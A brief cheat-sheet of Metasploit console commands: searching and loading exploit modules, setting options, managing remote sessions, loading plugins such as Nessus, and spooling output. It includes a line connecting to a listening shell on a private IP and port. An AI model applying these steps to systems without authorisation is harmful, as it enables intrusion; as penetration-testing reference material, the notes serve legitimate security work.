Skip to main content

core_commands

List of commands

help

To get more specific help about a commmand we can do:

help <command>

Other core commands are:

banner # shows the metasploit banner, useless
cd
pwd
color # enables/disables colorized output
history
grep
irb # gives us a ruby shell
save # saves msf configuration
route # routes traffic to a specific subnetwork
threads # shows the background threads of metasploit
version # prints the version
quit # quits metasploit
run # runs an exploit, also exploit does the same
connect 192.168.1.3 4444
# it is a low level connection and works like netcat
# in this case we must have a listening shell on the mentioned
# IP address and port

We can get the value of global variables with getg.

Searching Exploits

search type:exploit cve:2017 platform:windows
search type:exploit firefox

We can also show all the exploits but it is not advised, since a filtered search is most of the times better.

show exploits
# or
show payloads

Using Modules

Once we found out the module (exploits/auxiliary/...) we want to use we do:

use exploit/firefox/local/exec_shellcode

Now all the variables we will set will be in the context of the selected module.

We can list the variables (also called options) with:

show options

We can set/read options with set/get

set SESSION 1
get SESSION

we can also set/read global options with setg/getg. We can unset variables with unset/unsetg

unset SESSION
unsetg RHOST # if the variable is global

We can go out from the context of a module by issuing

back

Sessions

A session is an established connection with a remote machine. To list the available meterpreter sessions we can do:

sessions
sessions -k 1
# kills the session with id 1
sessions -K
# kills all the sessions

Plugins

We can load additional plugins with the load command, for example:

load nessus
# loads the nessus plugin

We can query this plugin now with

help nessus

We can unload a plugin with:

unload nessus

Saving Metasploit Output

spool /tmp/spooling
search cve:2017 platform:windows
spool off

now in /tmp/spooling we will have the output of our search.